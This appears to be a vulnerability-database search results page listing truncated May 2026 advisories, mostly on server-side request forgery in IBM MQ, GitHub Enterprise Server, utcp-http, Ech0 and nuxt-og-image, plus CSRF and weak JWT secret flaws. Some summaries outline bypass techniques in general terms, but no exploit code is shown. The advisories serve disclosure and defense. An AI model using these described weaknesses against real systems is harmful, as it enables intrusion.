Lucene search
K

89741 matches found

Tenable Nessus
Tenable Nessus
added 2026/05/08 12:0 a.m.6 views

IBM MQ 9.1 < 9.1.0.36 LTS / 9.2 < 9.2.0.42 LTS / 9.3 < 9.3.0.40 LTS / 9.3 < 9.4.5.1 CD / 9.4 < 9.4.0.21 LTS / 9.4.5.1 (7271941)

The version of IBM MQ Server running on the remote host is affected by a vulnerability as referenced in the 7271941 advisory. - IBM WebSphere Application Server - Liberty 17.0.0.3 through 26.0.0.3 IBM WebSphere Application Server Liberty is vulnerable to server-side request forgery SSRF. This may...

5.4CVSS7.3AI score0.00284EPSS
Exploits0References2
Snyk
Snyk
added 2026/05/07 10:32 p.m.11 views

Server-side Request Forgery (SSRF)

Overview utcp-http is an UTCP communication protocol plugin for HTTP, SSE, and streamable HTTP, plus an OpenAPI converter. Affected versions of this package are vulnerable to Server-side Request Forgery SSRF via the calltool and calltoolstreaming functions when attacker-controlled URLs from OpenA...

4.7CVSS5.8AI score0.00168EPSS
Exploits0References2
Github Security Blog
Github Security Blog
added 2026/05/07 10:32 p.m.13 views

utcp-http vulnerable to SSRF via attacker-controlled OpenAPI servers[0].url in HTTP communication protocol

Summary The utcp-http plugin is vulnerable to a blind Server-Side Request Forgery SSRF caused by a trust-boundary inconsistency between manual discovery and tool invocation. registermanual validates the discovery URL against an HTTPS / loopback allowlist, but calltool and calltoolstreaming reuse...

4.7CVSS5.9AI score0.00168EPSS
Exploits0References3Affected Software1
OSV
OSV
added 2026/05/07 10:32 p.m.5 views

GHSA-39J6-4867-GG4W utcp-http vulnerable to SSRF via attacker-controlled OpenAPI servers[0].url in HTTP communication protocol

Summary The utcp-http plugin is vulnerable to a blind Server-Side Request Forgery SSRF caused by a trust-boundary inconsistency between manual discovery and tool invocation. registermanual validates the discovery URL against an HTTPS / loopback allowlist, but calltool and calltoolstreaming reuse...

4.7CVSS5.9AI score0.00168EPSS
Exploits0References3
NVD
NVD
added 2026/05/07 10:16 p.m.46 views

CVE-2026-8034

A server-side request forgery SSRF vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a differe...

9.8CVSS0.00377EPSS
Exploits0References5
NVD
NVD
added 2026/05/07 10:16 p.m.27 views

CVE-2026-41105

Server-side request forgery ssrf in Azure Notification Service allows an authorized attacker to elevate privileges over a network...

8.1CVSS0.00827EPSS
Exploits0References1
Github Security Blog
Github Security Blog
added 2026/05/07 9:28 p.m.9 views

Ech0 has Server-Side Request Forgery (SSRF) via Connect Handler fetchPeerConnectInfo

Summary The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 uses httpUtil.SendRequest no SSRF protection instead of SendSafeRequest which has ValidatePublicHTTPURL with private IP blocking. This allows authenticated users to make the server request arbitrary URLs...

5.9AI score
Exploits0References3Affected Software1
OSV
OSV
added 2026/05/07 9:28 p.m.4 views

GHSA-8MC6-XJPR-H98X Ech0 has Server-Side Request Forgery (SSRF) via Connect Handler fetchPeerConnectInfo

Summary The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 uses httpUtil.SendRequest no SSRF protection instead of SendSafeRequest which has ValidatePublicHTTPURL with private IP blocking. This allows authenticated users to make the server request arbitrary URLs...

7.7CVSS5.9AI score
Exploits0References3
Snyk
Snyk
added 2026/05/07 9:28 p.m.8 views

Server-side Request Forgery (SSRF)

Overview Affected versions of this package are vulnerable to Server-side Request Forgery SSRF via the fetchPeerConnectInfo function. An attacker can access sensitive internal resources by supplying crafted URLs to the server, which are then requested on behalf of the authenticated user. Remediati...

7.7CVSS5.5AI score
Exploits0References2
Github Security Blog
Github Security Blog
added 2026/05/07 9:21 p.m.13 views

Ech0's Unauthenticated Like Endpoint Enables Arbitrary Engagement Metric Inflation

Summary No authentication is required to invoke PUT /api/echo/like/:id. The handler is registered on the public router group. The service increments favcount for the given echo without checking identity, without a per-user limit, and without CSRF tokens. A remote client can arbitrarily inflate li...

5.9AI score
Exploits0References3Affected Software1
OSV
OSV
added 2026/05/07 9:21 p.m.4 views

GHSA-RGJ7-VG8V-J4WR Ech0's Unauthenticated Like Endpoint Enables Arbitrary Engagement Metric Inflation

Summary No authentication is required to invoke PUT /api/echo/like/:id. The handler is registered on the public router group. The service increments favcount for the given echo without checking identity, without a per-user limit, and without CSRF tokens. A remote client can arbitrarily inflate li...

5.3CVSS5.9AI score
Exploits0References3
CVE
CVE
added 2026/05/07 9:18 p.m.31 views

CVE-2026-8034

CVE-2026-8034 is a server-side request forgery (SSRF) vulnerability in the GitHub Enterprise Server notebook viewer. The issue stems from URL parser confusion between the validation layer and the HTTP request library, where hostname validation uses a different parser than the request library, all...

9.8CVSS5.8AI score0.00377EPSS
Exploits0References5Affected Software1
Cvelist
Cvelist
added 2026/05/07 9:18 p.m.73 views

CVE-2026-8034 Server-side request forgery vulnerability in GitHub Enterprise Server notebook viewer via URL parser confusion

A server-side request forgery SSRF vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a differe...

7.9CVSS0.00377EPSS
Exploits0References5
NVD
NVD
added 2026/05/07 9:16 p.m.20 views

CVE-2026-42449

n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. In versions 2.47.4 through 2.47.13, the SDK embedder path N8NDocumentationMCPServer constructor, getN8nApiClient, and validateInstanceContext, the synchronous URL validator in...

8.5CVSS0.00206EPSS
Exploits0References2
Github Security Blog
Github Security Blog
added 2026/05/07 9:8 p.m.12 views

Note Mark has a JWT Secret Weakness that allows Full Account Takeover via Token Forgery

Summary No minimum length or entropy is enforced on the JWTSECRET configuration value. The application accepts any base64-decodable secret regardless of size, including secrets as short as 1 byte. HS256 secrets below 32 bytes are brute-forceable offline, allowing attackers to recover the signing...

10CVSS5.9AI score0.00124EPSS
Exploits0References5Affected Software1
ATTACKERKB
ATTACKERKB
added 2026/05/07 8:58 p.m.6 views

CVE-2026-41105

Server-side request forgery ssrf in Azure Notification Service allows an authorized attacker to elevate privileges over a network...

8.1CVSS5.8AI score0.00827EPSS
Exploits0References2
Snyk
Snyk
added 2026/05/07 8:52 p.m.7 views

Server-side Request Forgery (SSRF)

Overview nuxt-og-image is an Enlightened OG Image generation for Nuxt. Affected versions of this package are vulnerable to Server-side Request Forgery SSRF due to inadequate validation of user-supplied URLs in the isBlockedUrl process. An attacker can access internal network resources or sensitiv...

6.3CVSS5.8AI score0.00171EPSS
Exploits0References2
OSV
OSV
added 2026/05/07 8:52 p.m.4 views

GHSA-C2RM-G55X-8HR5 nuxt-og-image SSRF — bypass of GHSA-pqhr-mp3f-hrpp / v6.2.5 fix (IPv6 + redirect)

Summary The isBlockedUrl denylist introduced in [email protected] to remediate GHSA-pqhr-mp3f-hrpp Dmitry Prokhorov / Positive Technologies, March 2026 is incomplete. The patch advisory states "Decimal/hexadecimal IP encoding bypasses are also handled" — that part is true Node's WHATWG URL pars...

3.7CVSS6AI score0.00171EPSS
Exploits0References3
RedhatCVE
RedhatCVE
added 2026/05/07 8:21 p.m.10 views

CVE-2026-40174

Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the cUsers.updateAddress function does not properly validate anti-CSRF tokens for user address management operations. An attacker can induce a logged-in administrator to submit a forged request that adds,...

7.1CVSS5.7AI score0.00165EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/05/07 8:21 p.m.8 views

CVE-2026-40309

Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the cTrash.empty function does not validate anti-CSRF tokens for trash management requests. An attacker can induce a logged-in administrator to submit a forged request that empties the trash and permanent...

7.2CVSS5.7AI score0.00165EPSS
Exploits0References1
Rows per page
Query Builder